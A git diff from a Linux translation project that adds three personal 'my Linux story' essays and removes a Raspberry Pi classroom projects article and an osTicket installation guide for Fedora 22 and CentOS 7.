-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
-
-[1]:http://blog.gtvhacker.com/2013/chromecast-exploiting-the-newest-device-by-google/
-[2]:http://arstechnica.com/gadgets/2014/03/in-depth-with-android-wear-googles-quantum-leap-of-a-smartwatch-os/
-[3]:http://arstechnica.com/information-technology/2014/01/open-automotive-alliance-aims-to-bring-android-inside-the-car/
-[4]:http://arstechnica.com/gadgets/2014/04/documents-point-to-android-tv-googles-latest-bid-for-the-living-room/
-[5]:http://userexperienceawards.com/uxa2012/
-[6]:http://arstechnica.com/gadgets/2014/04/googles-next-design-challenge-unify-app-design-across-platforms/
-[a]:http://arstechnica.com/author/ronamadeo
-[t]:https://twitter.com/RonAmadeo
\ No newline at end of file
diff --git a/sources/talk/my-open-source-story/20160316 Growing a career alongside Linux.md b/sources/talk/my-open-source-story/20160316 Growing a career alongside Linux.md
new file mode 100644
index 0000000000..24799508c3
--- /dev/null
+++ b/sources/talk/my-open-source-story/20160316 Growing a career alongside Linux.md
@@ -0,0 +1,49 @@
+Growing a career alongside Linux
+==================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/OPENHERE_blue.png?itok=3eqp-7gT)
+
+My Linux story started in 1998 and continues today. Back then, I worked for The Gap, managing thousands of desktops running [OS/2][1] (and a few years later, [Warp 3.0][2]). As an OS/2 guy, I was really happy then. The desktops hummed along, and it was quite easy to support thousands of users with the tools The Gap had built. Changes were coming, though.
+
+In November of 1998, I received an invitation to join a brand new startup which would focus on Linux in the enterprise. This startup became quite famous as [Linuxcare][3].
+
+### My time at Linuxcare
+
+I had played with Linux a bit, but had never considered delivering it to enterprise customers. Mere months later (which is a turn of the corner in startup time and space), I was managing a line of business that let enterprises get their hardware, software, and even books certified on a few flavors of Linux that were popular back then.
+
+I supported customers like IBM, Dell, and HP in ensuring their hardware ran Linux successfully. You hear a lot about preloading Linux on hardware today, but way back then I was invited to Dell to discuss getting a laptop certified to run Linux for an upcoming trade show. Very exciting times! We also supported IBM and HP on a number of certification efforts that spanned a few years.
+
+Linux was changing fast, much like it always has. It gained hardware support for more key devices like sound, network, and graphics. At around that time, I shifted from RPM-based systems to [Debian][4] for my personal use.
+
+### Using Linux through the years
+
+Fast forward some years and I worked at a number of companies that did Linux as hardened appliances, Linux as custom software, and Linux in the data center. By the mid 2000s, I was busy doing consulting for that rather large software company in Redmond around some analysis and verification of Linux compared to their own solutions. My personal use had not changed though—I would still run Debian testing systems on anything I could.
+
+I really appreciated the flexibility of a distribution that floated and was forever updated. Debian is one of the most fun and well supported distributions and has the best community I've ever been a part of.
+
+When I look back at my own adoption of Linux, I remember with fondness the numerous Linux Expo trade shows in San Jose, San Francisco, Boston, and New York in the early and mid 2000s. At Linuxcare we always did fun and funky booths, and walking the show floor always resulted in getting re-acquainted with old friends. Rumors of work were always traded, and the entire thing underscored the fun of using Linux in real endeavors.
+
+The rise of virtualization and cloud has really made the use of Linux even more interesting. When I was with Linuxcare, we partnered with a small 30-person company in Palo Alto. We would drive to their offices and get things ready for a trade show that they would attend with us. Who would have ever known that little startup would become VMware?
+
+I have so many stories, and there were so many people I was so fortunate to meet and work with. Linux has evolved in so many ways and has become so important. And even with its increasing importance, Linux is still fun to use. I think its openness and the ability to modify it has contributed to a legion of new users, which always astounds me.
+
+### Today
+
+I've moved away from doing mainstream Linux things over the past five years. I manage large scale infrastructure projects that include a variety of OSs (both proprietary and open), but my heart has always been with Linux.
+
+The constant evolution and fun of using Linux has been a driving force for me over the past 18 years. I started with the 2.0 Linux kernel and have watched it become what it is now. It's a remarkable thing. An organic thing. A cool thing.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/3/my-linux-story-michael-perry
+
+作者:[Michael Perry][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/mpmilestogo
+[1]: https://en.wikipedia.org/wiki/OS/2
+[2]: https://archive.org/details/IBMOS2Warp3Collection
+[3]: https://en.wikipedia.org/wiki/Linuxcare
+[4]: https://www.debian.org/
diff --git a/sources/talk/my-open-source-story/20160330 After a nasty computer virus sys admin looks to Linux.md b/sources/talk/my-open-source-story/20160330 After a nasty computer virus sys admin looks to Linux.md
new file mode 100644
index 0000000000..3fb63afa4f
--- /dev/null
+++ b/sources/talk/my-open-source-story/20160330 After a nasty computer virus sys admin looks to Linux.md
@@ -0,0 +1,54 @@
+After a nasty computer virus, sys admin looks to Linux
+=======================================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/OPENHERE_blue.png?itok=3eqp-7gT)
+
+My first brush with open source came while I was working for my university as a part-time system administrator in 2001. I was part of a small group that created business case studies for teaching not just in the university, but elsewhere in academia.
+
+As the team grew, the need for a robust LAN setup with file serving, intranet applications, domain logons, etc. emerged. Our IT infrastructure consisted mostly of bootstrapped Windows 98 computers that had become too old for the university's IT labs and were reassigned to our department.
+
+### Discovering Linux
+
+One day, as part of the university's IT procurement plan, our department received an IBM server. We planned to use it as an Internet gateway, domain controller, file and backup server, and intranet application host.
+
+Upon unboxing, we noticed that it came with Red Hat Linux CDs. No one on our 22-person team (including me) knew anything about Linux. After a few days of research, I met a friend of a friend who did Linux RTOS programming for a living. I asked him for some help installing it.
+
+It was heady stuff as I watched the friend load up the CD drive with the first of the installation CDs and boot into the Anaconda install system. In about an hour we had completed the basic installation, but still had no working internet connection.
+
+Another hour of tinkering got us connected to the Internet, but we still weren't anywhere near domain logons or Internet gateway functionality. After another weekend of tinkering, we were able to instruct our Windows 98 terminals to accept the IP of the Linux PC as the proxy so that we had a working shared Internet connection. But domain logons were still some time away.
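+
+The proxy software isn't named above, but a minimal Squid-style configuration for sharing a connection with LAN clients looks roughly like this (a sketch for illustration only; the subnet is a placeholder):
+
+    # /etc/squid/squid.conf -- listen on the default proxy port
+    http_port 3128
+    # define the LAN and allow only it through the proxy
+    acl localnet src 192.168.1.0/24
+    http_access allow localnet
+    http_access deny all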
+
+We downloaded [Samba][1] over our awfully slow phone modem connection and hand-configured it to serve as the domain controller. File services were also enabled via the NFS kernel server, and we created user directories and made the necessary adjustments and configurations on Windows 98 in Network Neighborhood.
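+
+For reference, the domain-logon portion of a Samba configuration from that era looked roughly like the following (a sketch under assumptions rather than our exact file; the workgroup name and netlogon path are placeholders):
+
+    [global]
+    # NT-style domain name the Windows 98 clients will log on to (placeholder)
+    workgroup = OURDOMAIN
+    security = user
+    # act as the domain logon server for the LAN
+    domain logons = yes
+    os level = 65
+    domain master = yes
+    preferred master = yes
+
+    # share that Windows clients read logon scripts from
+    [netlogon]
+    path = /home/samba/netlogon
+    read only = yes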
+
+This setup ran flawlessly for quite some time, and we eventually decided to get started with Intranet applications for timesheet management and some other things. By this time, I was leaving the organization and had handed over most of the sys admin stuff to someone who replaced me.
+
+### A second Linux experience
+
+In 2004, I got into Linux once again. My wife ran an independent staff placement business that used data from services like Monster.com to connect clients with job seekers.
+
+As the more computer literate of the two of us, I was the one who had to set things right with the computer or Internet when things went wrong. We also needed to experiment with a lot of tools for sifting through the mountains of resumes and CVs she had to go through on a daily basis.
+
+Windows [BSoDs][2] were a routine affair, but that was tolerable as long as the data we paid for was safe. I had to spend a few hours each week creating backups.
+
+One day, we had a virus that simply would not go away. Little did we know what was happening to the data on the slave disk. When it finally failed, we plugged in the week-old slave backup and it failed a week later. Our second backup simply refused to boot up. It was time for professional help, so we took our PC to a reputable repair shop. After two days, we learned that some malware or virus had wiped certain file types, including our paid data, clean.
+
+This was a body blow to my wife's business plans and meant lost contracts and delayed invoice payments. I had in the interim travelled abroad on business and purchased my first laptop computer from [Computex 2004][3] in Taiwan. It had Windows XP pre-installed, but I wanted to replace it with Linux. I had read that Linux was ready for the desktop and that [Mandrake Linux][4] was a good choice. My first attempt at installation went without a glitch. Everything worked beautifully. I used [OpenOffice][5] for my writing, presentation, and spreadsheet needs.
+
+We got new hard drives for our computer and installed Mandrake Linux on them. OpenOffice replaced Microsoft Office. We relied on webmail for mailing needs, and [Mozilla Firefox][6] was a welcome change in November 2004. My wife saw the benefits immediately, as there were no crashes or virus/malware infections. More importantly, we bade goodbye to the frequent crashes that plagued Windows 98 and XP. She continued to use the same distribution.
+
+I, on the other hand, started playing around with other distributions. I love distro-hopping and trying out new ones every once in a while. I also regularly try and test out web applications like Drupal, Joomla, and WordPress on Apache and NGINX stacks. Our son, who was born in 2006, has grown up on Linux. He's very happy with Tux Paint, GCompris, and SMPlayer.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/3/my-linux-story-soumya-sarkar
+
+作者:[Soumya Sarkar][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/ssarkarhyd
+[1]: https://www.samba.org/
+[2]: https://en.wikipedia.org/wiki/Blue_Screen_of_Death
+[3]: https://en.wikipedia.org/wiki/Computex_Taipei
+[4]: https://en.wikipedia.org/wiki/Mandriva_Linux
+[5]: http://www.openoffice.org/
+[6]: https://www.mozilla.org/en-US/firefox/new/
diff --git a/sources/talk/my-open-source-story/20160510 Aspiring sys admin works his way up in Linux.md b/sources/talk/my-open-source-story/20160510 Aspiring sys admin works his way up in Linux.md
new file mode 100644
index 0000000000..7a2cc8d071
--- /dev/null
+++ b/sources/talk/my-open-source-story/20160510 Aspiring sys admin works his way up in Linux.md
@@ -0,0 +1,38 @@
+Aspiring sys admin works his way up in Linux
+===============================================
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/BIZ_workplay.png?itok=uQqFssrf)
+
+I first saw Linux in action around 2001 at my first job. I was an account manager for an Austrian automotive industry supplier and shared an office with our IT guy. He was creating a CD burning station (one of those huge things that can burn and print several CDs simultaneously) so that we could create and send CDs of our car parts catalogue to customers. While the burning station was originally designed for Windows, he just could not get it to work. He eventually gave up on Windows and turned to Linux, and it worked flawlessly.
+
+For me, it was all kind of arcane. Most of the work was done on the command line, which looked like DOS but was much more powerful (even back then, I recognized this). I had been a Mac user since 1993, and a CLI (command line interface) seemed a bit old fashioned to me at the time.
+
+It was not until years later—I believe around 2009—that I really discovered Linux for myself. By then, I had moved to the Netherlands and found a job working for a retail supplier. It was a small company (about 20 people) where, aside from my normal job as a key account manager, I had involuntarily become the first line of IT support. Whenever something didn't work, people first came to me before calling the expensive external IT consultant.
+
+One of my colleagues had fallen for a phishing attack and clicked on an .exe file in an email that appeared to be from DHL. (Yes, it does happen.) His computer got completely taken over and he could not do anything. Even a complete reformat wouldn't help, as the virus kept rearing its ugly head. I only later learned that it had probably written itself to the MBR (Master Boot Record). By this time, the contract with the external IT consultant had been terminated due to cost savings.
+
+I turned to Ubuntu to get my colleague to work again. And work it did—like a charm. The computer was humming along again, and I got all the important applications to work like they should. In some ways it wasn't the most elegant solution, I'll admit, yet he (and I) liked the speed and stability of the system.
+
+However, my colleague was so entrenched in the Windows world that he just couldn't get used to the fact that some things were done differently. He just kept complaining. (Sound familiar?)
+
+While my colleague couldn't bear that things were done differently, I noticed that this was much less of an issue for me as a Mac user. There were more similarities. I was intrigued. So, I installed a dual boot with Ubuntu on my work laptop and found that I got much more work done in less time and it was much easier to get the machine to do what I wanted. Ever since then I've been regularly using several Linux distros, with Ubuntu and Elementary being my personal favorites.
+
+At the moment, I am unemployed and hence have a lot of time to educate myself. Because I've always had an interest in IT, I am working to get into Linux systems administration. But it is awfully hard to get a chance to show your knowledge nowadays, because 95% of what I have learned over the years can't be shown on a paper with a stamp on it. Interviews are the place for me to have a conversation about what I know. So, I signed up for Linux certifications that I hope will give me the boost I need.
+
+I have also been contributing to open source for some time. I started by doing translations (English to German) for the xTuple ERP and have since moved on to doing Mozilla "customer service" on Twitter, filing bug reports, etc. I evangelize for free and open software (with varying degrees of success) and financially support several FOSS advocate organizations (DuckDuckGo, bof.nl, EFF, GIMP, LibreCAD, Wikipedia, and many others) whenever I can. I am also currently working to set up a regional privacy cafe.
+
+Aside from that, I have started working on my first book. It's supposed to be a lighthearted field manual for normal people about computer privacy and security, which I hope to self-publish by the end of the year. (The book will be licensed under Creative Commons.) As for content, you can expect that I will explain in detail why privacy is important and what is wrong with the whole "I have nothing to hide" mentality. But the biggest part will be instructions on how to get rid of pesky ad-trackers, encrypt your hard disk and mail, chat over OTR, use Tor, and so on. While it's a manual first, I aim for a tone that is casual and easy to understand, spiced up with stories of personal experiences.
+
+I still love my Macs and will use them whenever I can afford it (mainly because of the great construction), but Linux is always there in a VM and is used for most of my daily work. Nothing fancy here, though: word processing (LibreOffice and Scribus), working on my website and blog (Wordpress and Jekyll), editing some pictures (Shotwell and Gimp), listening to music (Rhythmbox), and pretty much every other task that comes along.
+
+Whichever way my job hunt turns out, I know that Linux will always be my go-to system.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/life/16/5/my-linux-story-rene-raggl
+
+作者:[Rene Raggl][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+[a]: https://opensource.com/users/rraggl
diff --git a/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md b/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md
index bf2ba1ff25..c017d22de2 100644
--- a/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md
+++ b/sources/talk/yearbook2015/20151208 10 tools for visual effects in Linux with Kdenlive.md
@@ -152,4 +152,4 @@ via: https://opensource.com/life/15/12/10-kdenlive-tools
[3]:http://frei0r.dyne.org/
[4]:http://www.kodak.com/global/en/professional/products/films/bw/triX2.jhtml
[5]:https://en.wikipedia.org/wiki/Fear_and_Loathing_in_Las_Vegas_(film)
-[6]:https://en.wikipedia.org/wiki/Dead_Island
\ No newline at end of file
+[6]:https://en.wikipedia.org/wiki/Dead_Island
diff --git a/sources/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md b/sources/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
deleted file mode 100644
index 302034c330..0000000000
--- a/sources/talk/yearbook2015/20151208 5 great Raspberry Pi projects for the classroom.md
+++ /dev/null
@@ -1,100 +0,0 @@
-taichirain 翻译中
-
-5 great Raspberry Pi projects for the classroom
-5 个适合课堂的树莓派项目
-================================================================================
-![](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/osdc-open-source-yearbook-lead3.png)
-
-Image by : opensource.com
-图片来源 : opensource.com
-
-### 1. Minecraft Pi ###
-
-Courtesy of the Raspberry Pi Foundation. [CC BY-SA 4.0.][1]
-
-Minecraft is the favorite game of pretty much every teenager in the world—and it's one of the most creative games ever to capture the attention of young people. The version that comes with every Raspberry Pi is not only a creative building game, but also comes with a programming interface allowing for additional interaction with the Minecraft world through Python code.
-
-Minecraft: Pi Edition is a great way for teachers to engage students with problem solving and writing code to perform tasks. You can use the Python API to build a house and have it follow you wherever you go, build a bridge wherever you walk, make it rain lava, show the temperature in the sky, and anything else your imagination can create.
-
-Read more in "[Getting Started with Minecraft Pi][2]."
-
-### 2. Reaction game and traffic lights ###
-
-![](https://opensource.com/sites/default/files/pi_traffic_installed_yellow_led_on.jpg)
-
-Courtesy of [Low Voltage Labs][3]. [CC BY-SA 4.0][1].
-
-It's really easy to get started with physical computing on Raspberry Pi—just connect up LEDs and buttons to the GPIO pins, and with a few lines of code you can turn lights on and control things with button presses. Once you know the code to do the basics, it's down to your imagination as to what you do next!
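-
-As a taste of how few lines "turn a light on" really needs, here is a shell sketch using the kernel's sysfs GPIO interface (assumptions for illustration: an LED wired to BCM pin 17, commands run as root):
-
-    # make pin 17 available to userspace and configure it as an output
-    echo 17 > /sys/class/gpio/export
-    echo out > /sys/class/gpio/gpio17/direction
-    # switch the LED on for a second, then off again
-    echo 1 > /sys/class/gpio/gpio17/value
-    sleep 1
-    echo 0 > /sys/class/gpio/gpio17/value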
-
-If you know how to flash one light, you can flash three. Pick out three LEDs in traffic light colors and you can code the traffic light sequence. If you know how to use a button to trigger an event, then you have a pedestrian crossing! Also look out for great pre-built traffic light add-ons like [PI-TRAFFIC][4], [PI-STOP][5], [Traffic HAT][6], and more.
-
-It's not always about the code—this can be used as an exercise in understanding how real world systems are devised. Computational thinking is a useful skill in any walk of life.
-
-![](https://opensource.com/sites/default/files/reaction-game.png)
-
-Courtesy of the Raspberry Pi Foundation. [CC BY-SA 4.0][1].
-
-Next, try wiring up two buttons and an LED and making a two-player reaction game—let the light come on after a random amount of time and see who can press the button first!
-
-To learn more, check out "[GPIO Zero recipes][7]." Everything you need is in [CamJam EduKit 1][8].
-
-### 3. Sense HAT Pixel Pet ###
-
-The Astro Pi—an augmented Raspberry Pi—is going to space this December, but you haven't missed your chance to get your hands on the hardware. The Sense HAT is the sensor board add-on used in the Astro Pi mission and it's available for anyone to buy. You can use it for data collection, science experiments, games and more. Watch this Geek Gurl Diaries video from Raspberry Pi's Carrie Anne for a great way to get started—by bringing to life an animated pixel pet of your own design on the Sense HAT display:
-
-注:youtube 视频
-
-
-Learn more in "[Exploring the Sense HAT][9]."
-
-### 4. Infrared bird box ###
-
-![](https://opensource.com/sites/default/files/ir-bird-box.png)
-Courtesy of the Raspberry Pi Foundation. [CC BY-SA 4.0.][1]
-
-A great exercise for the whole class to get involved with—place a Raspberry Pi and the NoIR camera module inside a bird box along with some infra-red lights so you can see in the dark, then stream video from the Pi over the network or on the internet. Wait for birds to nest and you can observe them without disturbing them in their habitat.
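-
-One possible way to do the streaming (a sketch, not necessarily the method in the linked guide; the port number is arbitrary) is to pipe the camera output into netcat:
-
-    # capture indefinitely and serve raw H.264 to whoever connects on port 8554
-    raspivid -t 0 -w 640 -h 480 -o - | nc -l 8554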
-
-Learn all about infrared and the light spectrum, and how to adjust the camera focus and control the camera in software.
-
-Learn more in "[Make an infrared bird box.][10]"
-
-### 5. Robotics ###
-
-![](https://opensource.com/sites/default/files/edukit3_1500-alex-eames-sm.jpg)
-
-Courtesy of Low Voltage Labs. [CC BY-SA 4.0][1].
-
-With a Raspberry Pi and as little as a couple of motors and a motor controller board, you can build your own robot. There is a vast range of robots you can make, from basic buggies held together by sellotape and a homemade chassis, all the way to self-aware, sensor-laden metallic stallions with camera attachments driven by games controllers.
-
-Learn how to control individual motors with something straightforward like the RTK Motor Controller Board (£8/$12), or dive into the new CamJam robotics kit (£17/$25) which comes with motors, wheels and a couple of sensors—great value and plenty of learning potential.
-
-Alternatively, if you'd like something more hardcore, try PiBorg's [4Borg][11] (£99/$150) or [DiddyBorg][12] (£180/$273) or go the whole hog and treat yourself to their DoodleBorg Metal edition (£250/$380)—and build a mini version of their infamous [DoodleBorg tank][13] (unfortunately not for sale).
-
-Check out the [CamJam robotics kit worksheets][14].
-
-
---------------------------------------------------------------------------------
-
-via: https://opensource.com/education/15/12/5-great-raspberry-pi-projects-classroom
-
-作者:[Ben Nuttall][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://opensource.com/users/bennuttall
-[1]:https://creativecommons.org/licenses/by-sa/4.0/
-[2]:https://opensource.com/life/15/5/getting-started-minecraft-pi
-[3]:http://lowvoltagelabs.com/
-[4]:http://lowvoltagelabs.com/products/pi-traffic/
-[5]:http://4tronix.co.uk/store/index.php?rt=product/product&product_id=390
-[6]:https://ryanteck.uk/hats/1-traffichat-0635648607122.html
-[7]:http://pythonhosted.org/gpiozero/recipes/
-[8]:http://camjam.me/?page_id=236
-[9]:https://opensource.com/life/15/10/exploring-raspberry-pi-sense-hat
-[10]:https://www.raspberrypi.org/learning/infrared-bird-box/
-[11]:https://www.piborg.org/4borg
-[12]:https://www.piborg.org/diddyborg
-[13]:https://www.piborg.org/doodleborg
-[14]:http://camjam.me/?page_id=1035#worksheets
diff --git a/sources/tech/20150817 How to Install OsTicket Ticketing System in Fedora 22 or Centos 7.md b/sources/tech/20150817 How to Install OsTicket Ticketing System in Fedora 22 or Centos 7.md
deleted file mode 100644
index 7a56750804..0000000000
--- a/sources/tech/20150817 How to Install OsTicket Ticketing System in Fedora 22 or Centos 7.md
+++ /dev/null
@@ -1,180 +0,0 @@
-translated by iov-wang
-How to Install OsTicket Ticketing System in Fedora 22 / Centos 7
-================================================================================
-In this article, we'll learn how to set up a help desk ticketing system with osTicket on a machine or server running Fedora 22 or CentOS 7. osTicket is a popular free and open source customer support ticketing system developed and maintained by [Enhancesoft][1] and its contributors. osTicket is a great solution for a help and support ticketing system, enabling better communication and support assistance with clients and customers. It can easily integrate inquiries created via email, phone, and web-based forms into a beautiful multi-user web interface. osTicket makes it easy to manage, organize, and log all our support requests and responses in one single place. It is a simple, lightweight, reliable, open source, web-based help desk ticketing system that is easy to set up and use.
-
-Here are some easy steps for setting up a help desk ticketing system with osTicket on the Fedora 22 or CentOS 7 operating system.
-
-### 1. Installing LAMP stack ###
-
-First of all, we'll need to install the LAMP stack to make osTicket work. The LAMP stack is the combination of the Apache web server, the MySQL or MariaDB database system, and PHP. To install the complete suite of LAMP packages that we need for the installation of osTicket, we'll need to run the following commands in a shell or a terminal.
-
-**On Fedora 22**
-
-The LAMP stack is available in the official repository of Fedora 22. As the default package manager of Fedora 22 is the new DNF package manager, we'll need to run the following command.
-
- $ sudo dnf install httpd mariadb mariadb-server php php-mysql php-fpm php-cli php-xml php-common php-gd php-imap php-mbstring wget
-
-**On CentOS 7**
-
-As the LAMP stack is available in the official repository of CentOS 7, we'll install it using the yum package manager.
-
- $ sudo yum install httpd mariadb mariadb-server php php-mysql php-fpm php-cli php-xml php-common php-gd php-imap php-mbstring wget
-
-### 2. Starting Apache Web Server and MariaDB ###
-
-Next, we'll start the MariaDB server and the Apache web server.
-
- $ sudo systemctl start mariadb httpd
-
-Then, we'll enable them to start on every boot of the system.
-
- $ sudo systemctl enable mariadb httpd
-
- Created symlink from /etc/systemd/system/multi-user.target.wants/mariadb.service to /usr/lib/systemd/system/mariadb.service.
- Created symlink from /etc/systemd/system/multi-user.target.wants/httpd.service to /usr/lib/systemd/system/httpd.service.
-
-### 3. Downloading osTicket package ###
-
-Next, we'll download the latest release of osTicket, i.e. version 1.9.9. We can download it from the official download page [http://osticket.com/download][2] or from the official github repository [https://github.com/osTicket/osTicket-1.8/releases][3]. Here, in this tutorial, we'll download the zip archive of the latest release of osTicket from the github release page using the wget command.
-
- $ cd /tmp/
- $ wget https://github.com/osTicket/osTicket-1.8/releases/download/v1.9.9/osTicket-v1.9.9-1-gbe2f138.zip
-
- --2015-07-16 09:14:23-- https://github.com/osTicket/osTicket-1.8/releases/download/v1.9.9/osTicket-v1.9.9-1-gbe2f138.zip
- Resolving github.com (github.com)... 192.30.252.131
- ...
- Connecting to s3.amazonaws.com (s3.amazonaws.com)|54.231.244.4|:443... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 7150871 (6.8M) [application/octet-stream]
- Saving to: ‘osTicket-v1.9.9-1-gbe2f138.zip’
- osTicket-v1.9.9-1-gb 100%[========================>] 6.82M 1.25MB/s in 12s
- 2015-07-16 09:14:37 (604 KB/s) - ‘osTicket-v1.9.9-1-gbe2f138.zip’ saved [7150871/7150871]
-
-### 4. Extracting the osTicket ###
-
-After we have successfully downloaded the osTicket zip package, we'll extract it. As the default root directory of the Apache web server is /var/www/html/ , we'll place the extracted contents there in a directory called "**support**". To do so, we'll need to run the following commands in a terminal or a shell.
-
- $ unzip osTicket-v1.9.9-1-gbe2f138.zip
-
-The zip extracts into a directory named **upload** under /tmp, which we'll then move into place as our **support** directory.
-
- $ sudo mv /tmp/upload /var/www/html/support
-
-### 5. Fixing Ownership and Permission ###
-
-Now, we'll assign the ownership of the directories and files under /var/www/html/support to the apache user, giving the Apache process owner write access. To do so, we'll need to run the following command.
-
- $ sudo chown apache: -R /var/www/html/support
-
-Then, we'll also need to copy the sample configuration file to the default configuration file location. To do so, we'll need to run the below commands.
-
- $ cd /var/www/html/support/
- $ sudo cp include/ost-sampleconfig.php include/ost-config.php
- $ sudo chmod 0666 include/ost-config.php
-
-If you have SELinux enabled on the system, run the following commands.
-
-    $ sudo chcon -R -t httpd_sys_content_t /var/www/html/support
-    $ sudo chcon -R -t httpd_sys_rw_content_t /var/www/html/support
-
-### 6. Configuring MariaDB ###
-
-As this is the first time we're configuring MariaDB, we'll need to create a password for the MariaDB root user so that we can use it to log in and create the database for our osTicket installation. To do so, we'll need to run the following command in a terminal or a shell.
-
- $ sudo mysql_secure_installation
-
- ...
- Enter current password for root (enter for none):
- OK, successfully used password, moving on...
-
- Setting the root password ensures that nobody can log into the MariaDB
- root user without the proper authorisation.
-
- Set root password? [Y/n] y
- New password:
- Re-enter new password:
- Password updated successfully!
- Reloading privilege tables..
- Success!
- ...
- All done! If you've completed all of the above steps, your MariaDB
- installation should now be secure.
-
- Thanks for using MariaDB!
-
-Note: Above, we are asked to enter the current root password of the MariaDB server, but as we are setting it up for the first time and no password has been set yet, we simply hit enter when asked for the current password. Then, we need to enter the new password we want to set twice. After that, we can simply hit enter at every remaining prompt to accept the default configuration.
-
-### 7. Creating osTicket Database ###
-
-As osTicket needs a database system to store its data and information, we'll be configuring MariaDB for osTicket. First, we'll need to log in to the MariaDB command environment. To do so, we'll need to run the following command.
-
- $ sudo mysql -u root -p
-
-Now, we'll create a new database "**osticket_db**" with user "**osticket_user**" and password "osticket_password", which will be granted access to the database. To do so, we'll need to run the following commands inside the MariaDB command environment.
-
- > CREATE DATABASE osticket_db;
- > CREATE USER 'osticket_user'@'localhost' IDENTIFIED BY 'osticket_password';
- > GRANT ALL PRIVILEGES on osticket_db.* TO 'osticket_user'@'localhost' ;
- > FLUSH PRIVILEGES;
- > EXIT;
-
-**Note**: It is strongly recommended that you replace the database name, user, and password with values of your own choosing, for security reasons.
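-
-Before moving on, we can optionally confirm that the new user can reach the database (a quick sanity check, not part of the original steps; the freshly created database will simply list no tables):
-
-    $ mysql -u osticket_user -p osticket_db -e "SHOW TABLES;"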
-
-### 8. Allowing Firewall ###
-
-If we are running a firewall program, we'll need to configure it to allow port 80 so that the Apache web server's default port is accessible externally. This will allow us to navigate our web browser to osTicket's web interface on the default http port 80. To do so, we'll need to run the following command.
-
- $ sudo firewall-cmd --zone=public --add-port=80/tcp --permanent
-
-Once done, we'll need to reload our firewall service.
-
- $ sudo firewall-cmd --reload
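-
-Optionally, we can verify that the rule took effect by listing the open ports in the zone (a quick check, not part of the original steps):
-
-    $ sudo firewall-cmd --zone=public --list-ports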
-
-### 9. Web based Installation ###
-
-Finally, if everything is done as described above, we should now be able to reach osTicket's installer by pointing our web browser to http://domain.com/support or http://ip-address/support . We'll be shown whether the dependencies required by osTicket are installed or not. As we've already installed all the necessary packages, we'll be welcomed with **green colored ticks** allowing us to proceed.
-
-![osTicket Requirements Check](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-requirements-check1.png)
-
-After that, we'll be required to enter the details for our osTicket instance as shown below. We'll need to enter the database name, username, password, and hostname, along with other important account information that we'll need when logging into the admin panel.
-
-![osticket configuration](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-configuration.png)
-
-After the installation has completed successfully, we'll be welcomed by a Congratulations screen. There we can see two links, one for our admin panel and the other for the support center, which serves as the homepage of the osTicket support help desk.
-
-![osticket installation completed](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-installation-completed.png)
-
-If we click on http://ip-address/support or http://domain.com/support, we'll be redirected to the osTicket support page, as shown below.
-
-![osticket support homepage](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-support-homepage.png)
-
-Next, to log in to the admin panel, we'll need to navigate our web browser to http://ip-address/support/scp or http://domain.com/support/scp . Then, we'll need to enter the login details we just created in the web installer above. After a successful login, we'll be able to access our dashboard and the other admin sections.
-
-![osticket admin panel](http://blog.linoxide.com/wp-content/uploads/2015/07/osticket-admin-panel.png)
-
-### 10. Post Installation ###
-
-After we have finished the web installation of osTicket, we'll need to secure some of our configuration files. To do so, we'll need to run the following commands.
-
- $ sudo rm -rf /var/www/html/support/setup/
- $ sudo chmod 644 /var/www/html/support/include/ost-config.php
-
-### Conclusion ###
-
-osTicket is an awesome help desk ticketing system providing a wealth of features. It supports rich text or HTML emails, ticket filters, agent collision avoidance, auto-responders, and much more. The user interface of osTicket is very beautiful, with an easy to use control panel. It is a complete set of tools for a help and support ticketing system, and a great way to give customers a better channel to communicate with the support team, helping a company keep its customers happy with its support and help desk. If you have any questions, suggestions, or feedback, please write them in the comment box below so that we can improve or update our content. Thank you! Enjoy :-)
-
-------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-osticket-fedora-22-centos-7/
-
-作者:[Arun Pyasi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://www.enhancesoft.com/
-[2]:http://osticket.com/download
-[3]:https://github.com/osTicket/osTicket-1.8/releases
diff --git a/sources/tech/20150906 How to Configure OpenNMS on CentOS 7.x.md b/sources/tech/20150906 How to Configure OpenNMS on CentOS 7.x.md
deleted file mode 100644
index aca2b04bba..0000000000
--- a/sources/tech/20150906 How to Configure OpenNMS on CentOS 7.x.md
+++ /dev/null
@@ -1,220 +0,0 @@
-translated by ivo-wang
-How to Configure OpenNMS on CentOS 7.x
-================================================================================
